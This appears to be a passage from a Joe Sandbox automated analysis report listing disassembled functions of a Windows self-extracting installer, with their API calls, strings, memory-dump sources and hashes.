                                                                                                                                                                                                                                                            Function 00DF1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00DF538C,?,?,00DF538C), ref: 00DF2005
                                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(00DF538C,wextract_cleanup0,?,?,00DF538C), ref: 00DF2017
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00DF538C,?,?,00DF538C), ref: 00DF2020
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                                                                            • API String ID: 849931509-702805525
                                                                                                                                                                                                                                                            • Opcode ID: 5c184e87013be939e815da104b1fd4254379797d96b303a675cae6e3eb01cc83
                                                                                                                                                                                                                                                            • Instruction ID: 8988f994bd6d8661324cea6c1de6e0eb454910b2e5d2d181133b1bd8d0c483e0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c184e87013be939e815da104b1fd4254379797d96b303a675cae6e3eb01cc83
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCE04F7195031CBBDB218B94FC0AF797B3AE700741F198194BA08E02A0EF615A58E636
                                                                                                                                                                                                                                                            Function 00DF4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00DF4DB5
                                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00DF4DDD
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AttributesFileItemText
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                            • API String ID: 3625706803-305352358
                                                                                                                                                                                                                                                            • Opcode ID: 4d50470a1258221a40115751c2c099dcda2de2dbd04195d1f8202e70f04bbc71
                                                                                                                                                                                                                                                            • Instruction ID: 18baf4fe903c82a6ef03801745ab4018caa71c5078aaf2df0ae8920dda4ecfda
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d50470a1258221a40115751c2c099dcda2de2dbd04195d1f8202e70f04bbc71
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B41253660020D8BCB259F38DD546B7B3A5EB45300F0EC668EA86D7299DB31DE86C770
                                                                                                                                                                                                                                                            Function 00DF4C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00DF4C54
                                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DF4C66
                                                                                                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00DF4C7E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2071732420-0
                                                                                                                                                                                                                                                            • Opcode ID: 423e9c5eea220085f26f548555be9cb864eb96320f6335b5d729184987ee4bdf
                                                                                                                                                                                                                                                            • Instruction ID: 0b1d059edd52d452820ece94067c10d8a4285006c69284ce6db94ef5875532d7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 423e9c5eea220085f26f548555be9cb864eb96320f6335b5d729184987ee4bdf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4F0907260120DAF9B64DFB8DC48DBB77ACEB04340B49C52AEA16C1150EA31E918D7B1
                                                                                                                                                                                                                                                            Function 00DF487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00DF4A23,?,00DF4F67,*MEMCAB,00008000,00000180), ref: 00DF48DE
                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00DF4F67,*MEMCAB,00008000,00000180), ref: 00DF4902
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                            • Opcode ID: 4daed97249abe5d2755189602d0881010de7662f50fbb0519371d32842af32c3
                                                                                                                                                                                                                                                            • Instruction ID: f24a9e8169db2260d0efe633736acddcc8da35e2f3f4f0f6269463a06621ee87
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4daed97249abe5d2755189602d0881010de7662f50fbb0519371d32842af32c3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 710128A7E1267826F22440294C88BB7551CCB96674F1F8335BEEAE62D1D5649C0481F0
                                                                                                                                                                                                                                                            Function 00DF4AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00DF3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00DF369F
                                                                                                                                                                                                                                                              • Part of subcall function 00DF3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00DF36B2
                                                                                                                                                                                                                                                              • Part of subcall function 00DF3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00DF36DA
                                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00DF4B05
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1084409-0
                                                                                                                                                                                                                                                            • Opcode ID: 1e4f6faf73bdccf82a48f69e8a7a18d3d1e87495f19d1f86f88e65335eec4a25
                                                                                                                                                                                                                                                            • Instruction ID: 5771b7384d929ab5b3bb3d6b8074fb51635c5ca7f7230c7969328623aabfc5c3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e4f6faf73bdccf82a48f69e8a7a18d3d1e87495f19d1f86f88e65335eec4a25
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE016931600309ABDB148F68EC15BB6B759AB54725F0AC225EA39D62E1CB70D812DBB1
                                                                                                                                                                                                                                                            Function 00DF658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CharPrevA.USER32(00DF8B3E,00DF8B3F,00000001,00DF8B3E,-00000003,?,00DF60EC,00DF1140,?), ref: 00DF65BA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                                            • Opcode ID: 56f034a9c0332c22ae6c40ac91fb206dd8871723de56c50c478ea040ebc9d6dd
                                                                                                                                                                                                                                                            • Instruction ID: 5ca60c143b92cf96189c4abee16db658d4b27fe83950deb18f89119a1406c2c1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56f034a9c0332c22ae6c40ac91fb206dd8871723de56c50c478ea040ebc9d6dd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17F042321042589BD731451D9884B76BFDDDB86350F1E815EEADEE3705CA55DC4583B0
                                                                                                                                                                                                                                                            Function 00DF621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00DF623F
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DF4518
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00DF4554
                                                                                                                                                                                                                                                              • Part of subcall function 00DF6285: GetLastError.KERNEL32(00DF5BBC), ref: 00DF6285
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                                            • Opcode ID: 03626d5b0de2054feddc2b999b66ee2ba486691f98b176c27e3556ac659a68f0
                                                                                                                                                                                                                                                            • Instruction ID: 686075743217978451cc6159620075b1aaad62307187036af400abffd1356068
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03626d5b0de2054feddc2b999b66ee2ba486691f98b176c27e3556ac659a68f0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EF0B4B060030C6BD750EB74AD02BBE76A8DB54300F41806AAB89D6181DD74D944C674
                                                                                                                                                                                                                                                            Function 00DF66AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,00DF4777,?,00DF4E38,?), ref: 00DF66B1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                            • Opcode ID: 177d671d9eaed097bc5369b2c9fe0ff1f0364e468b46bf19604e07e297a5ec8d
                                                                                                                                                                                                                                                            • Instruction ID: a274e962eadf71452f769a48eb559b7908ae5b5a13e1a375a98d8a59145a31cb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 177d671d9eaed097bc5369b2c9fe0ff1f0364e468b46bf19604e07e297a5ec8d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19B092B6222544426A2006357C295662941A6C123A7E99B90F13AC16E4CE3EC846D028
                                                                                                                                                                                                                                                            Function 00DF4B60 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,00000000,00000000,?,00DF4FA1,00000000), ref: 00DF4B98
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                            • Opcode ID: f413a103cb7963a284ca7e7ca72147edba8a61047dbdf58493d9e2fb0f127a20
                                                                                                                                                                                                                                                            • Instruction ID: 3e181d3fc0e699f7f504933ef4fc1447d48b2648d87342da0b6faa6f81285e81
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f413a103cb7963a284ca7e7ca72147edba8a61047dbdf58493d9e2fb0f127a20
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF0FE71900B089E47618E39DC08673BBE8AE95361311C96AD5BFD6191EB32A441EBB1
                                                                                                                                                                                                                                                            Function 00DF4CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 00DF4CAA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                                            • Opcode ID: 65b5f4bb339e085fbe1876460e633f7ef9e6476a5e522d6064bbc8b4215e44df
                                                                                                                                                                                                                                                            • Instruction ID: 678fe6c7e949d1563a532419425ebe93380fb5f6b6a8eb3f9ca65fb94b59a530
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65b5f4bb339e085fbe1876460e633f7ef9e6476a5e522d6064bbc8b4215e44df
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8B0123204430CB7CF001FC6FC09F953F1DE7C4761F148000F60C891908E729410C6AA
                                                                                                                                                                                                                                                            Function 00DF4CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                                                            • Opcode ID: 7c8351fa50c970b592b0e0d660b4156767c88335c593a5623438ab47f1cbe0a2
                                                                                                                                                                                                                                                            • Instruction ID: aa2f10601c16cd61d576d97a20b08e76b6da49b4499788e70a7c4191c97dc8fd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c8351fa50c970b592b0e0d660b4156767c88335c593a5623438ab47f1cbe0a2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CB0123100020CB78F001B46FC088553F1DD6C02607008010F50C851218F339811C595

                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                            Function 00DF5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CharNextA.USER32(?,00000000,?,?), ref: 00DF5CEE
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00DF8B3E,00000104,00000000,?,?), ref: 00DF5DFC
                                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00DF5E3E
                                                                                                                                                                                                                                                            • CharUpperA.USER32(-00000052), ref: 00DF5EE1
                                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00DF5F6F
                                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00DF5FA7
                                                                                                                                                                                                                                                            • CharUpperA.USER32(-0000004E), ref: 00DF6008
                                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00DF60AA
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00DF1140,00000000,00000040,00000000), ref: 00DF61F1
                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00DF61F8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                                            • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                                            • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                                            • Opcode ID: 49614d4b90bcc6ba0a93b294aeff735dc4fece828ad7ea37cecdcbb4ca6c7f28
                                                                                                                                                                                                                                                            • Instruction ID: cf27084c0e315f50c0b5e9dadeaf64ad6f45c7bf4e6126a7e117eccb4859fb32
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49614d4b90bcc6ba0a93b294aeff735dc4fece828ad7ea37cecdcbb4ca6c7f28
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70D14871A04B4C5ADB358B38AC483B57B61AB16304F1EC0E9D7D6C6699DA70CE86CB31
                                                                                                                                                                                                                                                            Function 00DF1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00DF1EFB
                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00DF1F02
                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00DF1FD3
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                            • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                                            • Opcode ID: 5869d8aef36f0d23499b5dbb10267692fd54d9957717fc772b2ec889161b8069
                                                                                                                                                                                                                                                            • Instruction ID: 860bc2b07d6fbf8cd9693fc821e1cf32c49c0fb92e87fc6352edcc9238d98e5f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5869d8aef36f0d23499b5dbb10267692fd54d9957717fc772b2ec889161b8069
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4421D8B6A40309FBDB205BA59C4AFBB76B8EF85710F16C018FB06E6284DB748801D671
                                                                                                                                                                                                                                                            Function 00DF17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON
